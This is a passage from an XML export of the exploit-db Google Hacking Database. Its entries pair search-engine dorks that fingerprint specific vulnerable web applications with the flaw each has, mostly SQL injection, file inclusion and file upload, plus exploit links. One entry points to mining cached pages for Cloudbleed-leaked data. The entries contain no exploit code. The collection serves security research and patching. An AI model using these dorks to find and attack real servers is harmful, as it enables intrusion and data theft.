<textualDescription>bugtraq id 11336objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 06, 2004updated Oct 06, 2004vulnerable BlackBoard Internet Newsboard System BlackBoard Internet Newsboard System 1.5.1BlackBoard Internet Newsboard System is reported prone to a remote file include vulnerability. This issue presents itself because the application fails to sanitize user-supplied data properly. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.BlackBoard Internet Newsboard System version 1.5.1 is reported prone to this vulnerability. It is possible that prior versions are affected as well.</textualDescription>
<query>&quot;BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen&quot;</query>
<querystring>https://www.google.com/search?q=%22BlackBoard+1.5.1-f+%7C+%C2%A9+2003-4+by+Yves+Goergen%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>1886</id>
<link>https://www.exploit-db.com/ghdb/1886</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;BlogMe PHP created by Gamma Scripts&quot;</shortDescription>
<textualDescription>BlogMe PHP (comments.php id) SQL Injection Vulnerability - CVE: 2008-2175: https://www.exploit-db.com/exploits/5533</textualDescription>
<query>&quot;BlogMe PHP created by Gamma Scripts&quot;</query>
<querystring>https://www.google.com/search?q=%22BlogMe+PHP+created+by+Gamma+Scripts%22</querystring>
<edb>https://www.exploit-db.com/exploits/5533</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>555</id>
<link>https://www.exploit-db.com/ghdb/555</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;BosDates Calendar System &quot; &quot;powered by BosDates v3.2 by BosDev&quot;</shortDescription>
<textualDescription>&quot;BosDates is a flexible calendar system which allows for multiple calendars, email notifications, repeating events and much more. All of which are easily maintained by even the least technical users.&quot; There is a vulnerability in BosDates that allows an attacker to disclose sensitive information via SQL injection.</textualDescription>
<query>&quot;BosDates Calendar System &quot; &quot;powered by BosDates v3.2 by BosDev&quot;</query>
<querystring>https://www.google.com/search?q=%22BosDates+Calendar+System+%22+%22powered+by+BosDates+v3.2+by+BosDev%22&amp;btnG=B%C3%BAsqueda</querystring>
<edb></edb>
<date>2004-10-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>1786</id>
<link>https://www.exploit-db.com/ghdb/1786</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Browse with Interactive Map&quot;</shortDescription>
<textualDescription>PHP Real Estate (fullnews.php id) Remote SQL Injection Vulnerability - CVE: 2007-6462: https://www.exploit-db.com/exploits/4737</textualDescription>
<query>&quot;Browse with Interactive Map&quot;</query>
<querystring>https://www.google.com/search?q=%22Browse+with+Interactive+Map%22</querystring>
<edb>https://www.exploit-db.com/exploits/4737</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2541</id>
<link>https://www.exploit-db.com/ghdb/2541</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Bu Site Ticimax E-Ticaret yazılımı ile hazırlanmıştır.&quot;</shortDescription>
<textualDescription>Ticimax E-Ticaret ( SQL Injection ): https://www.exploit-db.com/exploits/12841</textualDescription>
<query>&quot;Bu Site Ticimax E-Ticaret yazılımı ile hazırlanmıştır.&quot;</query>
<querystring>https://www.google.com/search?q=%22Bu+Site+Ticimax+E-Ticaret+yaz%C4%B1l%C4%B1m%C4%B1+ile+haz%C4%B1rlanm%C4%B1%C5%9Ft%C4%B1r.%22</querystring>
<edb>https://www.exploit-db.com/exploits/12841</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3497</id>
<link>https://www.exploit-db.com/ghdb/3497</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;by eXtreme Crew&quot;</shortDescription>
<textualDescription>extreme-fusion 4.02 Remote Code Execution: https://www.exploit-db.com/exploits/2937</textualDescription>
<query>&quot;by eXtreme Crew&quot;</query>
<querystring>https://www.google.com/search?q=%22by+eXtreme+Crew%22</querystring>
<edb>https://www.exploit-db.com/exploits/2937</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3274</id>
<link>https://www.exploit-db.com/ghdb/3274</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;By Geeklog&quot; &quot;Created this page in&quot; +seconds +powered</shortDescription>
<textualDescription>Geeklog v1.6.0sr2 - Remote File Upload: https://www.exploit-db.com/exploits/9855</textualDescription>
<query>&quot;By Geeklog&quot; &quot;Created this page in&quot; +seconds +powered</query>
<querystring>https://www.google.com/search?q=%22By+Geeklog%22+%22Created+this+page+in%22+%2Bseconds+%2Bpowered</querystring>
<edb>https://www.exploit-db.com/exploits/9855</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3367</id>
<link>https://www.exploit-db.com/ghdb/3367</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;By Geeklog&quot; &quot;Created this page in&quot; +seconds +powered inurl:public_html</shortDescription>
<textualDescription>Geeklog 1.6.0sr1 Remote Arbitrary File Upload Vulnerability: https://www.exploit-db.com/exploits/9505</textualDescription>
<query>&quot;By Geeklog&quot; &quot;Created this page in&quot; +seconds +powered inurl:public_html</query>
<querystring>https://www.google.com/search?q=%22By+Geeklog%22+%22Created+this+page+in%22+%2Bseconds+%2Bpowered+inurl:public_html</querystring>
<edb>https://www.exploit-db.com/exploits/9505</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2651</id>
<link>https://www.exploit-db.com/ghdb/2651</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;by in-link&quot; or &quot;Powered by In-Link 2.&quot;</shortDescription>
<textualDescription>In-link 2.3.4 (ADODB_DIR) Remote File Include Vulnerabilities: https://www.exploit-db.com/exploits/2295</textualDescription>
<query>&quot;by in-link&quot; or &quot;Powered by In-Link 2.&quot;</query>
<querystring>https://www.google.com/search?q=%22by+in-link%22++or++%22Powered+by+In-Link+2.%22</querystring>
<edb>https://www.exploit-db.com/exploits/2295</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3385</id>
<link>https://www.exploit-db.com/ghdb/3385</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;by Pivot - 1.40.5&quot; +'Dreadwind' -pivotlog.net</shortDescription>
<textualDescription>Pivot 1.40.5 Dreamwind load_template() Credentials Disclosure - CVE: 2008-3128: https://www.exploit-db.com/exploits/5973</textualDescription>
<query>&quot;by Pivot - 1.40.5&quot; +'Dreadwind' -pivotlog.net</query>
<querystring>https://www.google.com/search?q=%22by+Pivot+-+1.40.5%22++%2B'Dreadwind'+-pivotlog.net</querystring>
<edb>https://www.exploit-db.com/exploits/5973</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1092</id>
<link>https://www.exploit-db.com/ghdb/1092</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Calendar programming by AppIdeas.com&quot; filetype:php</shortDescription>
<textualDescription>phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting This search does not narrow to vulnerable versions.software:site: http://open.appideas.comdownload: http://open.appideas.com/Calendar/original advisory: http://rgod.altervista.org/phpccal.html</textualDescription>
<query>&quot;Calendar programming by AppIdeas.com&quot; filetype:php</query>
<querystring>https://www.google.com/search?hl=it&amp;q=%22Calendar+programming+by+AppIdeas.com%22+filetype%3Aphp&amp;btnG=Cerca+con+Google</querystring>
<edb></edb>
<date>2005-09-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1860</id>
<link>https://www.exploit-db.com/ghdb/1860</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;CaLogic Calendars V1.2.2&quot;</shortDescription>
<textualDescription>CaLogic Calendars 1.2.2 (langsel) Remote SQL Injection Vulnerability - CVE: 2008-2444: https://www.exploit-db.com/exploits/5607</textualDescription>
<query>&quot;CaLogic Calendars V1.2.2&quot;</query>
<querystring>https://www.google.com/search?q=%22CaLogic+Calendars+V1.2.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/5607</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4400</id>
<link>https://www.exploit-db.com/ghdb/4400</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;CF-Host-Origin-IP&quot; &quot;CF-Int-Brand-ID&quot; &quot;CF-RAY&quot; &quot;CF-Visitor&quot; &quot;github&quot; -site:github.com -site:cloudfare.com</shortDescription>
<textualDescription>Dork:
&quot;CF-Host-Origin-IP&quot; &quot;CF-Int-Brand-ID&quot; &quot;CF-RAY&quot; &quot;CF-Visitor&quot; &quot;github&quot;
-site:github.com -site:cloudfare.com
Replace &quot;github.com&quot; with any of the other Cloudfare servers as can be
found here.
https://github.com/pirate/sites-using-cloudflare
Look at cached results for data leaked from memory due to &quot;Cloudbleed&quot;
vulnerability.
https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/</textualDescription>
<query>&quot;CF-Host-Origin-IP&quot; &quot;CF-Int-Brand-ID&quot; &quot;CF-RAY&quot; &quot;CF-Visitor&quot; &quot;github&quot; -site:github.com -site:cloudfare.com</query>
<querystring>https://www.google.com/search?q=&quot;CF-Host-Origin-IP&quot; &quot;CF-Int-Brand-ID&quot; &quot;CF-RAY&quot; &quot;CF-Visitor&quot; &quot;github&quot; -site:github.com -site:cloudfare.com</querystring>
<edb></edb>
<date>2017-02-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>6888</id>
<link>https://www.exploit-db.com/ghdb/6888</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;citsmart.local&quot;</shortDescription>
<textualDescription># Google Dork: &quot;citsmart.local&quot;
# CITSmart ITSM 9.1.2.22 - LDAP Injection. CVE : CVE-2020-35775. https://www.exploit-db.com/exploits/49762
# CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated).
# CVE : CVE-2021-28142. https://www.exploit-db.com/exploits/49763
# Date: 16/4/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;citsmart.local&quot;</query>
<querystring>https://www.google.com/search?q=&quot;citsmart.local&quot;</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>2048</id>
<link>https://www.exploit-db.com/ghdb/2048</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;ClanSys v.1.1&quot;</shortDescription>
<textualDescription>Clansys v.1.1 (index.php page) PHP Code Insertion Vulnerability - CVE: 2006-2005: https://www.exploit-db.com/exploits/1710</textualDescription>
<query>&quot;ClanSys v.1.1&quot;</query>
<querystring>https://www.google.com/search?q=%22ClanSys+v.1.1%22</querystring>
<edb>https://www.exploit-db.com/exploits/1710</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2553</id>
<link>https://www.exploit-db.com/ghdb/2553</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;cms SunLight 5.2&quot;</shortDescription>
<textualDescription>SunLight CMS 5.3 (root) Remote File Inclusion Vulnerabilities - CVE: 2007-2774: https://www.exploit-db.com/exploits/3953</textualDescription>
<query>&quot;cms SunLight 5.2&quot;</query>
<querystring>https://www.google.com/search?q=%22cms+SunLight+5.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/3953</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2272</id>
<link>https://www.exploit-db.com/ghdb/2272</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;CMS Webmanager-pro&quot;</shortDescription>
<textualDescription>CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities - CVE: 2008-2351: https://www.exploit-db.com/exploits/5641</textualDescription>
<query>&quot;CMS Webmanager-pro&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22CMS+Webmanager-pro%22</querystring>
<edb>https://www.exploit-db.com/exploits/5641</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3307</id>
<link>https://www.exploit-db.com/ghdb/3307</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Cms.tut.su, 2009 g.&quot;</shortDescription>
<textualDescription>CMS Chainuk 1.2 Multiple Remote Vulnerabilities - CVE: 2009-2333: https://www.exploit-db.com/exploits/9069</textualDescription>
<query>&quot;Cms.tut.su, 2009 g.&quot;</query>
<querystring>https://www.google.com/search?q=%22Cms.tut.su,+2009+g.%22</querystring>
<edb>https://www.exploit-db.com/exploits/9069</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1785</id>
<link>https://www.exploit-db.com/ghdb/1785</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;CNStats 2.9&quot;</shortDescription>
<textualDescription>CNStats 2.9 (who_r.php bj) Remote File Inclusion Vulnerability - CVE: 2007-2086: https://www.exploit-db.com/exploits/3741</textualDescription>
<query>&quot;CNStats 2.9&quot;</query>
<querystring>https://www.google.com/search?q=%22CNStats+2.9%22</querystring>
<edb>https://www.exploit-db.com/exploits/3741</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1667</id>
<link>https://www.exploit-db.com/ghdb/1667</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;com_joom12pic&quot;</shortDescription>
<textualDescription>Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability - CVE: 2007-4954: https://www.exploit-db.com/exploits/4416</textualDescription>
<query>&quot;com_joom12pic&quot;</query>
<querystring>https://www.google.com/search?q=%22com_joom12pic%22</querystring>
<edb>https://www.exploit-db.com/exploits/4416</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1703</id>
<link>https://www.exploit-db.com/ghdb/1703</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;com_joomlaflashfun&quot;</shortDescription>
<textualDescription>Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability - CVE: 2007-4955: https://www.exploit-db.com/exploits/4415</textualDescription>
<query>&quot;com_joomlaflashfun&quot;</query>
<querystring>https://www.google.com/search?q=%22com_joomlaflashfun%22</querystring>
<edb>https://www.exploit-db.com/exploits/4415</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1961</id>
<link>https://www.exploit-db.com/ghdb/1961</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;com_lmo&quot;</shortDescription>
<textualDescription>Joomla LMO Component 1.0b2 Remote Include Vulnerability - CVE: 2006-3970: https://www.exploit-db.com/exploits/2092</textualDescription>
<query>&quot;com_lmo&quot;</query>
<querystring>https://www.google.com/search?q=%22com_lmo%22</querystring>
<edb>https://www.exploit-db.com/exploits/2092</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3555</id>
<link>https://www.exploit-db.com/ghdb/3555</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Content managed by the Etomite Content Management System&quot;</shortDescription>
<textualDescription>Etomite CMS 0.6.1 (username) SQL Injection - CVE: 2006-3904:
https://www.exploit-db.com/exploits/2071</textualDescription>
<query>&quot;Content managed by the Etomite Content Management System&quot;</query>
<querystring>https://www.google.com/search?q=%22Content+managed+by+the+Etomite+Content+Management+System%22</querystring>
<edb>https://www.exploit-db.com/exploits/2071</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1733</id>
<link>https://www.exploit-db.com/ghdb/1733</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright (C) 2000 Phorum Development Team&quot;</shortDescription>
<textualDescription>Phorum 3.2.11 (common.php) Remote File Include Vulnerability - CVE: 2006-6550: https://www.exploit-db.com/exploits/2894</textualDescription>
<query>&quot;Copyright (C) 2000 Phorum Development Team&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyright+(C)+2000++Phorum+Development+Team%22</querystring>
<edb>https://www.exploit-db.com/exploits/2894</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2078</id>
<link>https://www.exploit-db.com/ghdb/2078</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright (c) 2004-2006 by Simple PHP Guestbook&quot;</shortDescription>
<textualDescription>Simple PHP Guestbook Remote Admin Access: https://www.exploit-db.com/exploits/10666</textualDescription>
<query>&quot;Copyright (c) 2004-2006 by Simple PHP Guestbook&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyright+(c)+2004-2006+by+Simple+PHP+Guestbook%22</querystring>
<edb>https://www.exploit-db.com/exploits/10666</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1204</id>
<link>https://www.exploit-db.com/ghdb/1204</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved&quot; &quot;Mambo is Free Software released&quot;</shortDescription>
<textualDescription>this dork is for Mambo 4.5.2x Globals overwrite / remote command execution exploit:http://rgod.altervista.org/mambo452_xpl.html</textualDescription>
<query>&quot;Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved&quot; &quot;Mambo is Free Software released&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyright+2000+-+2005+Miro+International+Pty+Ltd.+All+rights+reserved%22+%22Mambo+is+Free+Software+released%22</querystring>
<edb></edb>
<date>2005-11-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>1113</id>
<link>https://www.exploit-db.com/ghdb/1113</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright 2004 © Digital Scribe v.1.4&quot;</shortDescription>
<textualDescription>Digital Scribe v1.4 Login Bypass / SQL injection / remote code executionsoftware site: http://www.digital-scribe.org/description: &quot;Teachers have full control through a web-based interface. Designedfor easy installation and even easier use, the Digital Scribe has been used in thousands of schools. No teacher or IT Personnel needs to know any computer languages in order to install and use this intuitive system.rgodsite: http://rgod.altervista.orgemail: retrogod at aliceposta it</textualDescription>
<query>&quot;Copyright 2004 © Digital Scribe v.1.4&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyright+2004+%C2%A9+Digital+Scribe+v.1.4%22&amp;hl=it&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3235</id>
<link>https://www.exploit-db.com/ghdb/3235</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright 2004 easy-content forums&quot;</shortDescription>
<textualDescription>Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities - CVE: 2006-2697: https://www.exploit-db.com/exploits/1834</textualDescription>
<query>&quot;Copyright 2004 easy-content forums&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyright+2004+easy-content+forums%22</querystring>
<edb>https://www.exploit-db.com/exploits/1834</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2668</id>
<link>https://www.exploit-db.com/ghdb/2668</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright 2005 Affiliate Directory&quot;</shortDescription>
<textualDescription>SFS Affiliate Directory (id) SQL Injection Vulnerability - CVE: 2008-3719: https://www.exploit-db.com/exploits/6270</textualDescription>
<query>&quot;Copyright 2005 Affiliate Directory&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyright+2005+Affiliate+Directory%22</querystring>
<edb>https://www.exploit-db.com/exploits/6270</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3379</id>
<link>https://www.exploit-db.com/ghdb/3379</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;copyright 2006 Broadband Mechanics&quot;</shortDescription>
<textualDescription>PeopleAggregator 1.2pre6-release-53 Multiple RFI Vulnerabilities - CVE: 2007-5631: https://www.exploit-db.com/exploits/4551</textualDescription>
<query>&quot;copyright 2006 Broadband Mechanics&quot;</query>
<querystring>https://www.google.com/search?q=%22copyright+2006+Broadband+Mechanics%22</querystring>
<edb>https://www.exploit-db.com/exploits/4551</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1749</id>
<link>https://www.exploit-db.com/ghdb/1749</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright 2008 ImenAfzar ver :2.0.0.0&quot;</shortDescription>
<textualDescription>Namad (IMenAfzar) 2.0.0.0 Remote File Disclosure Vulnerability: https://www.exploit-db.com/exploits/8734</textualDescription>
<query>&quot;Copyright 2008 ImenAfzar ver :2.0.0.0&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyright+2008+ImenAfzar+ver+:2.0.0.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/8734</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3472</id>
<link>https://www.exploit-db.com/ghdb/3472</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright @2007 Iatek LLC&quot;</shortDescription>
<textualDescription>PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities - CVE: 2008-4612: https://www.exploit-db.com/exploits/4848</textualDescription>
<query>&quot;Copyright @2007 Iatek LLC&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyright+%402007+Iatek+LLC%22</querystring>
<edb>https://www.exploit-db.com/exploits/4848</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>587</id>
<link>https://www.exploit-db.com/ghdb/587</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright © 2002 Agustin Dondo Scripts&quot;</shortDescription>
<textualDescription>CoolPHP has multiple vulnerabilities:* Cross-Site Scripting vulnerability (index.php)* A Path Disclosure Vulnerability (index.php)* Local file include Vulnerability with Directory Traversal info: http://www.securityfocus.com/archive/1/378617</textualDescription>
<query>&quot;Copyright © 2002 Agustin Dondo Scripts&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=%22Copyright+%C2%A9+2002+Agustin+Dondo+Scripts%22</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>3532</id>
<link>https://www.exploit-db.com/ghdb/3532</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright Devellion Limited 2005. All rights reserved.&quot;</shortDescription>
<textualDescription>CubeCart 3.0.11 (oid) Remote Blind SQL Injection - CVE: 2006-4267: https://www.exploit-db.com/exploits/2198</textualDescription>
<query>&quot;Copyright Devellion Limited 2005. All rights reserved.&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyright+Devellion+Limited+2005.+All+rights+reserved.%22</querystring>
<edb>https://www.exploit-db.com/exploits/2198</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2053</id>
<link>https://www.exploit-db.com/ghdb/2053</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright Interactivefx.ie&quot;</shortDescription>
<textualDescription>Interactivefx.ie CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11873</textualDescription>
<query>&quot;Copyright Interactivefx.ie&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyright+Interactivefx.ie%22</querystring>
<edb>https://www.exploit-db.com/exploits/11873</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3326</id>
<link>https://www.exploit-db.com/ghdb/3326</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright KerviNet&quot;</shortDescription>
<textualDescription>KerviNet Forum 1.1 Multiple Remote Vulnerabilities - CVE: 2009-2326: https://www.exploit-db.com/exploits/9068</textualDescription>
<query>&quot;Copyright KerviNet&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyright+KerviNet%22</querystring>
<edb>https://www.exploit-db.com/exploits/9068</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2151</id>
<link>https://www.exploit-db.com/ghdb/2151</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright MaxiSepet ©&quot;</shortDescription>
<textualDescription>MaxiSepet 1.0 (link) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/1900</textualDescription>
<query>&quot;Copyright MaxiSepet ©&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyright+MaxiSepet+%C2%A9%22</querystring>
<edb>https://www.exploit-db.com/exploits/1900</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2798</id>
<link>https://www.exploit-db.com/ghdb/2798</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyright-2008@zeejobsite.com&quot;</shortDescription>
<textualDescription>ZEEJOBSITE 2.0 Remote File Upload Vulnerability - CVE: 2008-6913: https://www.exploit-db.com/exploits/7062</textualDescription>
<query>&quot;Copyright-2008@zeejobsite.com&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyright-2008%40zeejobsite.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/7062</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2363</id>
<link>https://www.exploit-db.com/ghdb/2363</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Copyrights © 2005 Belgische Federale Overheidsdiensten&quot;</shortDescription>
<textualDescription>Newsmanager 2.0 (RFI/RFD/SQL/PB) Multiple Remote Vulnerabilities - CVE: 2008-2342: https://www.exploit-db.com/exploits/5624</textualDescription>
<query>&quot;Copyrights © 2005 Belgische Federale Overheidsdiensten&quot;</query>
<querystring>https://www.google.com/search?q=%22Copyrights+%C3%82%C2%A9+2005+Belgische+Federale+Overheidsdiensten%22</querystring>
<edb>https://www.exploit-db.com/exploits/5624</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1141</id>
<link>https://www.exploit-db.com/ghdb/1141</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;CosmoShop by Zaunz Publishing&quot; inurl:&quot;cgi-bin/cosmoshop/lshop.cgi&quot; -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*</shortDescription>
<textualDescription>cosmoshop is a comercial shop system written as a CGI.vulnerabilities:sql injection, passwords saved in cleartext, view any filehttp://www.securityfocus.com/archive/1/409510/30/120/threaded</textualDescription>
<query>&quot;CosmoShop by Zaunz Publishing&quot; inurl:&quot;cgi-bin/cosmoshop/lshop.cgi&quot; -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22CosmoShop+by+Zaunz+Publishing%22+inurl%3A%22cgi-bin%2Fcosmoshop%2Flshop.cgi%22+-johnny.ihackstuff.com+-V8.10.106+-V8.10.100+-V.8.10.85+-V8.10.108+-V8.11*</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1457</id>
<link>https://www.exploit-db.com/ghdb/1457</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Create your own free webring and bring traffic to your website. Join now, it's free!&quot;</shortDescription>
<textualDescription>Prozilla Webring Website Script (category.php cat) Remote SQL Injection - CVE: 2007-4362: https://www.exploit-db.com/exploits/4284</textualDescription>
<query>&quot;Create your own free webring and bring traffic to your website. Join now, it's free!&quot;</query>
<querystring>https://www.google.com/search?q=%22Create+your+own+free+webring+and+bring+traffic+to+your+website.+Join+now,+it's+free!%22</querystring>
<edb>https://www.exploit-db.com/exploits/4284</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1671</id>
<link>https://www.exploit-db.com/ghdb/1671</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Created by weenCompany&quot;</shortDescription>
<textualDescription>weenCompany SQL Injection Vulnerability - CVE: 2009-4423: https://www.exploit-db.com/exploits/10606</textualDescription>
<query>&quot;Created by weenCompany&quot;</query>
<querystring>https://www.google.com/search?q=%22Created+by+weenCompany%22</querystring>
<edb>https://www.exploit-db.com/exploits/10606</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2700</id>
<link>https://www.exploit-db.com/ghdb/2700</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Creative Guestbook&quot;</shortDescription>
<textualDescription>Creative Guestbook 1.0 Multiple Remote Vulnerabilities - CVE: 2007-1479: https://www.exploit-db.com/exploits/3489</textualDescription>
<query>&quot;Creative Guestbook&quot;</query>
<querystring>https://www.google.com/search?q=%22Creative+Guestbook%22</querystring>
<edb>https://www.exploit-db.com/exploits/3489</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1164</id>
<link>https://www.exploit-db.com/ghdb/1164</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Cyphor (Release:&quot; -www.cynox.ch</shortDescription>
<textualDescription>Cyphor 0.19 (possibly prior versions) SQL Injection / Board takeover / cross site scriptingmy advisory &amp; poc exploit:http://rgod.altervista.org/cyphor019.htmlrgodModerator PS: The software is longer maintained.</textualDescription>
<query>&quot;Cyphor (Release:&quot; -www.cynox.ch</query>
<querystring>https://www.google.com/search?q=%22Cyphor+%28Release%3A%22+-www.cynox.ch</querystring>
<edb></edb>
<date>2005-10-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>1726</id>
<link>https://www.exploit-db.com/ghdb/1726</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;CzarNews v1.12 &quot; | &quot;CzarNews v1.13&quot; | &quot;CzarNews v1.14 &quot;</shortDescription>
